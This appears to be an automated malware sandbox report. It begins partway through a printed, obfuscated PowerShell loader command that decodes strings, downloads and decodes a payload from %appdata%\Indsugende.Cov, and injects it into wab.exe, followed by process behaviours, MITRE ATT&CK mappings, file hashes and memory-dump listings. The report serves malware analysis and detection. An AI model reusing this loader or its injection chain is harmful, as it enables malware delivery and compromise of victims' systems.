';$Munist=Lastepallers 'Subp >Trita ';$Rollelistes=Lastepallers 'Ite.eiBesk.e ApotxPineg ';$Crinitory='Kassedamen';Tillgsbevillingernes (Lastepallers 'apl.mS BailebeskutManks- .rucCUdlndo,angen GiratBoerneStrudn S.cct Chee Uds,- RealP ounaSwimmt B ushPrste Fibr TVelvi:Th.ym\Re.obW ,ontiHvernnUdblsdSalicrSjleko Han.wN,ndieU ykkd Back.LatertChoanxUnorntAph.s Undr-U felVGrnsuaD.sselrealku SubveAfslu Ratin$Hu.hoCOve grBreeciTo,menUnderiCresotUdvaloWinber BortyTherm;Banan ');Tillgsbevillingernes (Lastepallers ' ShewiSkurvfCrimi Goofb(Trutht ehave Coe.sNaugetInd,k-BuskopFejlfa .lurt Opgahretab GeninTMonke:Dermi\Film.WForesiDamebnCasewdSubenrRu,tnoOpsamw CriceMha mdDiplo.UncaptSkispxStlant alu)Flute{GloomeVidtlxSv.ini,astntIn.st}Dv.gf;Reckv ');$Noughts = Lastepallers 'BooteenietzcShakehpimgeoVenst Skatt%Engela Slo pKarenpRotondSisbaaMy hotXero.a Fors%Selvu\ResulIHeretnPo tpdutrobsAfforuBeby,gMaloneV.luenDemicdunpoleF rjt.EnterC Lo,no UnduvTorri Uds e&Tea.r&Bevis Sul.gePomaccSuprahTvin.oAnthi opfin$Ossif ';Tillgsbevillingernes (Lastepallers 'Hus y$St.gtgSt.aplBippeoUdsalbA,beja Selel Kano:RumbaCVe,sioGavebtCurtstOvermoJaggenUnpleeScotae H at=.ecul(Boligc Boepm Palmd Cowh Nonor/Jew.lcSalva Ditc$N,nemNFyrstoCalcuuTungegG rmahDecaytra iosMotor) g.si ');Tillgsbevillingernes (Lastepallers 'Be.bn$M,tisgLegerlGazeboOvertbKvindaHermalRaa,s:BiffyCGavfluInverrCr,netStalasP evo=Synd,$ StfrLSkbneoNonaloFrimudBlive.Mi,rosRhythpF,rtklM ntaiSerodtPseud(Tears$LakfeMBrochuMouilnTaaleiVipersP.rrotBorts) Sant ');$Lood=$Curts[0];Tillgsbevillingernes (Lastepallers 'Afste$Nichog.urrelStat.oR,toobUdplua Com,l S,ka:,onreFs.unkii.genrC aseeArgummA,desa,nwaisMine.t Ae.oeel.ctr Bible,adstn elfosInsta=NonarNde.oneBut rw Tung-do,ilOMerudb ForsjChauseUnsorcPerlotVa.dr SupplSCor.ey .okksO.erat Supee StrkmG lse..usikNSkoseeDruertgamen.E,ighWDvefreOvergbSclerC wardlSvaleiLampeeKraftnGemmetE,der ');Tillgsbevillingernes (Lastepallers 'Trip,$CalliFFlaskiHen,irPre.oeGenn mMid.iaLin es forvtDipteeslagvrBeedie Unden efrsTh.mi. .robHOctameCoempaD rpld T ffeJuridrAbsorsLad,n[Bndel$Transs Fol.tC,ntriPara,kCrispnKrigeifascin Leong FaireHighhn Oblo].ueak=North$QuinqPski,loTartyitrivan MilvtHyls,ePlatydBiogrl.ortaycas.w ');$sportsfiskerforbundenes=Lastepallers ' AffaF,sjapiMiddarAnkome F agmSensiaLoders EmbotSprg eFarsqr Afide Vi,nn kartsPorte. MuddDGod,toInconw eetfnRhizolSanito BankaAdenidDisloF Ma.riborrol ignae Conj(Demok$HvorlLNonpeoNondaobecqudHgtn.,.vagh$ MataNP.acooEkvi ngremigG.mmeoCostlsPera pPl.toeMisocl Lace) P.as ';$sportsfiskerforbundenes=$Cottonee[1]+$sportsfiskerforbundenes;$Nongospel=$Cottonee[0];Tillgsbevillingernes (Lastepallers 'Repro$Ty,ergGlde,lDeliboChavabPrivaaElverlDanne:SuasiPRuckll,lavoePr.ktn fribu FrikmChrysd Tilbi Ski.sFamilkSpeleuTops s BooksRhizoiAtopiocholenTeagleParadrslagtnBittieSca,p1For.d8Dom.u5 Hams= Srst(Mono.TPuppeeEkspls HalvtPhoto-HubshPDeuteaR olftTrigghP.evi nunn$,ushoNmim soMillinHemicgL prooMaxifsFjernpbeirae LuftlUlt,a)De.ut ');while (!$Plenumdiskussionerne185) {Tillgsbevillingernes (Lastepallers 'Forre$ TaargHeredlGift.oFragrb.ygmaa hynil.esnr:B engU Vikkn Ov,rrN.chee EnslaBes,isNoncos M rdu SandrDepreiWemlenFas.hgsilic=Pensa$ BazatTry frLimpiu,airyeasyls ') ;Tillgsbevillingernes $sportsfiskerforbundenes;Tillgsbevillingernes (Lastepallers 'Hy osSVirkst,enora,astlr MisvtSeism- PoreSLedgelT,onseClangeCorrip olo Naal4Smidi ');Tillgsbevillingernes (Lastepallers 'U eti$FinlagMinorlTricho everbEgritaFallilOxid,:OscilPKondolArgaieNeur,n My,su,ejfnm FrstdprojeiTroposPent.kBog mu SubssUnders DerviTovtroRetten ,hiteStatsr.indbnEm loeSkatt1Irreg8Frema5B nal=Exits(Fo,geTKoroveLejlisL,quat Hist-Cano,PChetoaRafletpsykohEffra Ma,dr$Je,teN A,groEfternU dergReexpo Kno.sUnsu pAnacreGittel .jre)corre ') ;Tillgsbevillingernes (Lastepallers ' Sjus$GlbbogL,ibnl.llokoVin ebLynbra Tyt lJapon: RestRTithiyAdmirg,aicieKontrk Sepiuu torptracdj FluozSu adeTipurn OharsKage.=Acerv$SigmogTohomlParapopleadbMan,faUgidel St,e:acrosJ,elesa YearmR,ggebAnve,o U,sprA.rhueDepureB,fat+Sulph+ egis%Codli$DelikCBro muRoorbrVarsitFindesTetra.Hampec anco .eseuKompanForfltFakul ') ;$Lood=$Curts[$Rygekupjzens];}$Rigsfyrsten=287903;$Colonized=30553;Tillgsbevillingernes (Lastepallers 'Tr,gt$FletcgDybvalSireno.runjbPhemia EftelGaleg: forrSVith tC.exiyLinjerEngel Hig,a=Kaver S,reaGBunkee DetatFored-Pa,afCDeccaotottenHog otAsconehovednMedictKreer Austr$Pri.oN U vioMvhkinp,ossg discoAetiosIncitpChaneeDrag l Snip ');Tillgsbevillingernes (Lastepallers 'e cen$SplengVandllUn,etoAchyrbOv rcaEfforlP.emo:StyreT ByzoeTalcez He,ic r.ckuSekstcAv.lsa BasanSosi Duble=Unsug lten[YdeevSagteryChunksInexitS luge Modsmparth.CribrCsubmuoPterynFort,vFestkeRadiarTurnptAfp,e]rosin:Sekti:NondyFEs larProwloPlattm.idnaBVagilaUnivesPtol.eSters6Hvidl4FribaSPseu,tModstrEndotiAngelnopposgsper (.elod$unfr SAdornt Voc,yRegimrPreco) Coli ');Tillgsbevillingernes (Lastepallers 'Invol$whu.sgBi lil UnrioironibSnakeapendul ,ost:CountSBassieDriftp fdrt InkaeOmgivmSt.udfCervelV.riauFun,to ForsuAgnetsanmas1Bevg.5Debit3Calcs Sacia=Blods Dikt [PrehaSJetalyEr.ndsTorm tActine RoysmPiben. .angTIndkaeCamphxBisektLil,a. TrugE lillnVir ucSexanoLus,edCe,eri m,innFistegReg.e]Sjlla:hekto:du,seAVandpSCorepCV.ratIAre.dIOpr.n.CatapG decoeErstat enfoS ,taftHall,r .orti,evienCentegGru,d(Fi,dy$ TeleTBermmeChurczBarytcExcisuSciurcEfteraS pplnTavse)Imit ');Tillgsbevillingernes (Lastepallers ' Avas$UbetagRnneblboggsoProetbSvaekaUndvilDa.pd: Uv,lCEquesoserramBainiaJ.mpieFlertrFuldsnBa,dyeRatho=Hanne$BoligS DuffeSportp Se.at T.ldeMetabmtilfifViatil anskuSalloo Syndu NonisUges.1Preen5Skind3Halc .WoodcsFol.euNic,sbMeldesm,nimtVedhfrAfspoiForbnnCar,ogProgr( Tuml$ InduRF.iluiShippgmeditsFidusfUdskyyDaggerHausssCoupetFarleebaandnAsabe,Sul.o$StedkCPreinoRntgelHovedoHerdsn Bagaium.auzP omoeGhostd F rn) ,ndo ');Tillgsbevillingernes $Comaerne;"
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4428
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indsugende.Cov && echo $"
    3⤵
    PID:3936
- - C:\Program Files (x86)\windows mail\wab.exe
    "C:\Program Files (x86)\windows mail\wab.exe"
    3⤵
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
01f6d72b5b393cc9da0cf0999531628c

SHA1
575a3ce0e00e20cbcf5f108654b653b7abf0ce73

SHA256
543b85ccce008b8183762d5314650e04a3e3574673e62209965853a497a77a23

SHA512
e2f68cea9401796945b9322e7dfa727c503fa17d3f344c329194c1038e4239421d350a725ce806084e4e797d87a0f629eb25fe5f6f42e605305d079a0cdb2ec6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

Filesize
724B

MD5
ac89a852c2aaa3d389b2d2dd312ad367

SHA1
8f421dd6493c61dbda6b839e2debb7b50a20c930

SHA256
0b720e19270c672f9b6e0ec40b468ac49376807de08a814573fe038779534f45

SHA512
c6a88f33688cc0c287f04005e07d5b5e4a8721d204aa429f93ade2a56aeb86e05d89a8f7a44c1e93359a185a4c5f418240c6cdbc5a21314226681c744cf37f36

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5

Filesize
471B

MD5
046f171b946784ec0cbd3cfaf046300e

SHA1
86eaa8389744d27e4dee135e4eefcdea84e191dc

SHA256
afbeac8a6bcd405bc72ca142570d0a56ebaeddb3c4513bcbb8a5aafdfce8f7d5

SHA512
b4e5d4eb5c96ee1061f83fd785a6b8f78cbb7b9d99e1e44784c814cfebfcda0751432ce8c4cf6f67c6b27e60b1e5b25c4a7029543c8c31f07d5af5e4fb69ee71

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_EF661923814A32CDEAE31FC86EE4EF00

Filesize
471B

MD5
fbfd1e327c91cc773092dbca42b0963b

SHA1
7c10bf74fe127d47d732a577dfad498a7fe8a1d1

SHA256
7133c3e33ddd0ac67de61e2c8f07ce1191499f5f765386e8d867ad25e858f74e

SHA512
0e9a6b9a111a4c33f7f43fb5ea3072f78bf75870dcda0f1a12237f2847e9742d38e6836b55f130a137a7547015e09734b054c7c44829ad68b68ec0f245fba21d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
9cb3d2254ca5242ad60bdeb8103a7385

SHA1
f882b8adc2e8224a69fc5a75ae60812dbb380b8f

SHA256
6130f6341b8258233a128a01d93c589167fd2d269a4018b29227500c4e25d547

SHA512
f145d83879f63747c7f3f5aee3d2a11b66b5bd18ddbebd7a1fdf5622ee803ca3c05d6097b85079770c595cd00cfcfa04d61088c7e1487d6c6f8196a0f5cf1dd8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

Filesize
392B

MD5
1c99d17d5897b8a5d8a38b931549f63a

SHA1
1f6ad3b4a66b83d8f436102cdf820adf83f84376

SHA256
51a28fec6b7a3582807bd82cd5f5ba9230b52ca41d14127f9768efbd5714fc71

SHA512
ba84c5e0ceb0c1bee7a7d6c29185395e6f013d1932f0e63c1da45983db63db6994684da53cab6d0a5bfe0cd35982ede57d31719f695e9e2431357c0961d7ad04

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5

Filesize
418B

MD5
6084ef325bfc7b8478b98abf7fba2181

SHA1
6206be41ae36b4e1454a58a2cfed994cb52c8311

SHA256
3e463576cf5dea8c44e4597ee850835e440bb3e400128d5d00ce202b360058fa

SHA512
62c57e584f7e293838671168648b6396aaf3eb7ed57259b8e8ce437de9fa9028bc00a7234596c623058d578f2ad85f7ca4600172c0a98bd0bad73aba14f12c76

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_EF661923814A32CDEAE31FC86EE4EF00

Filesize
410B

MD5
a83519fecf61e06e4516d38a79669519

SHA1
96e5a23229c5b8ed2281827f064ef7609b8a54ba

SHA256
c7d707899e01faa772d8f7508d02fba7e5aeb67fc83a55d4e1995ba334895cc1

SHA512
d6940e5fc217b9ccdac4f970388789f4d3e5d2caf90c4cf69c7e76c3be9f13e6f50068587a01c67b1ba19a965db3d0769bd9713bccb5de5d1e86c2bc844a6561

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
25604a2821749d30ca35877a7669dff9

SHA1
49c624275363c7b6768452db6868f8100aa967be

SHA256
7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

SHA512
206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
bbb161be7b328f7fcb2eb96199317d87

SHA1
f856f33d36d1e2f73914647bf09de742eddc3511

SHA256
a52bc771aca54a9e053753416acb6b562a629f7cbbb3af88a715cf8c16e9f1a8

SHA512
48b854e25a2bf8f0316fd6a2bbcdc2588f5275e522b3ce9200e44dac47b95874ab36768e46967f73a485f2a69bd532b55b30bb8fe7dc460abfabad0b3676ecfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ocicelm.wg3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Indsugende.Cov

Filesize
414KB

MD5
5a20c4ad947c413ae35b83b2ddf0f347

SHA1
9bb3d72e4beac2e189c18b5991741783b9fd6ace

SHA256
37186afd5ff7c5d1963e5ddbd3bbb9f1b6c7ccc9fcbe11a74de7c883949248fa

SHA512
10e9013d34f640fd0752ce21ef3f42b3b868923e60ef2538b0505b4940a817a927fbe986332dd0d925e1ac338b0accaa53c29f7d9bd8e6eab8eca6fe5178de91

Download Submit
memory/3428-18-0x0000000005DA0000-0x0000000005DEC000-memory.dmp

Filesize
304KB

Download
memory/3428-2-0x0000000070BB0000-0x0000000071360000-memory.dmp

Filesize
7.7MB

Download
memory/3428-22-0x0000000006F30000-0x0000000006F52000-memory.dmp

Filesize
136KB

Download
memory/3428-12-0x0000000005740000-0x0000000005A94000-memory.dmp

Filesize
3.3MB

Download
memory/3428-38-0x0000000070BBE000-0x0000000070BBF000-memory.dmp

Filesize
4KB

Download
memory/3428-39-0x0000000070BB0000-0x0000000071360000-memory.dmp

Filesize
7.7MB

Download
memory/3428-40-0x0000000070BB0000-0x0000000071360000-memory.dmp

Filesize
7.7MB

Download
memory/3428-21-0x0000000007010000-0x00000000070A6000-memory.dmp

Filesize
600KB

Download
memory/3428-17-0x0000000005D70000-0x0000000005D8E000-memory.dmp

Filesize
120KB

Download
memory/3428-1-0x00000000047A0000-0x00000000047D6000-memory.dmp

Filesize
216KB

Download
memory/3428-59-0x0000000070BB0000-0x0000000071360000-memory.dmp

Filesize
7.7MB

Download
memory/3428-6-0x0000000005620000-0x0000000005686000-memory.dmp

Filesize
408KB

Download
memory/3428-3-0x0000000004E10000-0x0000000005438000-memory.dmp

Filesize
6.2MB

Download
memory/3428-4-0x0000000004DA0000-0x0000000004DC2000-memory.dmp

Filesize
136KB

Download
memory/3428-20-0x0000000006300000-0x000000000631A000-memory.dmp

Filesize
104KB

Download
memory/3428-23-0x00000000081E0000-0x0000000008784000-memory.dmp

Filesize
5.6MB

Download
memory/3428-19-0x00000000075B0000-0x0000000007C2A000-memory.dmp

Filesize
6.5MB

Download
memory/3428-5-0x00000000055B0000-0x0000000005616000-memory.dmp

Filesize
408KB

Download
memory/3428-0-0x0000000070BBE000-0x0000000070BBF000-memory.dmp

Filesize
4KB

Download
memory/3600-90-0x0000000000E00000-0x0000000002054000-memory.dmp

Filesize
18.3MB

Download
memory/3600-91-0x0000000000E00000-0x0000000000E42000-memory.dmp

Filesize
264KB

Download
memory/4428-75-0x00000000064A0000-0x00000000067F4000-memory.dmp

Filesize
3.3MB

Download
memory/4428-77-0x0000000006B40000-0x0000000006B8C000-memory.dmp

Filesize
304KB

Download
memory/4500-36-0x0000000008C60000-0x000000000AC1C000-memory.dmp

Filesize
31.7MB

Download
memory/4576-62-0x0000000022440000-0x000000002244A000-memory.dmp

Filesize
40KB

Download
memory/4576-61-0x0000000022B10000-0x0000000022BA2000-memory.dmp

Filesize
584KB

Download
memory/4576-60-0x0000000022450000-0x00000000224A0000-memory.dmp

Filesize
320KB

Download
memory/4576-56-0x0000000000CD0000-0x0000000000D12000-memory.dmp

Filesize
264KB

Download
memory/4576-55-0x0000000000CD0000-0x0000000001F24000-memory.dmp

Filesize
18.3MB

Download